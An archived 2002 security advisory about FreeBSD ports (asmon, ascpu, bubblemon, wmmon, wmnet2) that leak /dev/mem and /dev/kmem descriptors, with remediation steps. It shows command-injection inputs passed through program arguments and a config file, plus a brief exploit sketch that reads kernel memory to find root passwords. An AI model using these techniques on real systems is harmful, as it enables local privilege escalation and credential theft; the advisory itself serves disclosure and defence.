TUCoPS :: BSD :: bsd5696.htm

libkvm permits privilege execution
17th Sep 2002 [SBWID-5696]
COMMAND

	
		libkvm permits priviledge escalation
	
	

SYSTEMS AFFECTED

	
		All software linked to libkvm prior to FreeBSD 4.6.2-RELEASE
	
	

PROBLEM

	
		From    an    issue    exclusively    disclosed    to    iDEFENSE     by
		[badc0ded@badc0ded.com]      [http://www.idefense.com/contributor.html],
		David Endler posted :
		

		The FreeBSD ports asmon, ascpu, bubblemon,  wmmon,  and  wmnet2  can  be
		locally manipulated to take advantage of open file descriptors  /dev/mem
		and /dev/kmem to gain root privileges  on  a  target  host.  These  five
		programs are installed setgid kmem  by  default.  They  will  drop  kmem
		privileges  before  executing   user   specified   commands   but   file
		descriptors to /dev/mem and /dev/kmem will remain open.  This  can  lead
		to a local root compromise in various ways (e.g. if an attacker  chooses
		to scan for the master password file in the Linux kernel memory).
		

		 ANALYSIS

		

		The latest versions of  all  five  above  mentioned  FreeBSD  ports  are
		vulnerable, the following examples illustrate the problems:
		

		bash-2.05a$ bubblemon "dummy&/usr/local/sbin/lsof|grep

		dummy|grep mem"

		

		dummy 688 dim 4r VCHR 2,0 0t0 21146 /dev/mem

		dummy 688 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem

		

		bash-2.05a$ ascpu -exe "dummy&/usr/local/sbin/lsof|grep dummy|grep

		mem"

		

		dummy 650 dim 4r VCHR 2,0 0t0 21146 /dev/mem

		dummy 650 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem

		

		bash-2.05a$ cat .wmmonrc

		left "/home/dim/dummy"

		bash-2.05a$ wmmon &

		[1] 793

		bash-2.05a$ Monitoring 5 devices for activity.

		current stat is :1

		

		bash-2.05a$ /usr/local/sbin/lsof |grep dummy|grep mem

		dummy 797 dim 3r VCHR 2,0 0t0 21146 /dev/mem

		dummy 797 dim 4r VCHR 2,1 0xc040f54c 21145 /dev/kmem

		

		bash-2.05a$ wmnet2 -e "dummy&/usr/local/sbin/lsof|grep

		dummy|grep mem"

		wmnet: using kmem driver to monitor ec0

		dummy 584 dim 3r VCHR 2,0 0t0 21146 /dev/mem

		dummy 584 dim 4r VCHR 2,1 0xc037cb8f 21145 /dev/kmem

		

		One possible exploit for these vulnerabilities is to replace getch()  in
		strings(1) with:
		

		int getch()

		{

		char buf[4];

		read(4,buf,1);

		return buf[0];

		}

		

		or a similar less CPU expensive function that  reads  a  character  from
		the /dev/mem file descriptor and execute the following:
		

		wmnet2 -e exploit|grep root|grep Charlie

		
	
	

SOLUTION

	
		Upgrade your vulnerable system to  4.6-STABLE;  or  to  the  RELENG_4_6,
		RELENG_4_5, or RELENG_4_4 security branch  dated  after  the  correction
		date (4.6.2-RELEASE-p2, 4.5-RELEASE-p20, or 4.4-RELEASE-p27).
		

		Alternatively  you  could  remove   the   setgid   bit   from   affected
		applications, however reducing the functionality:
		

		 chmod g-s /path.to/wmnet2

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH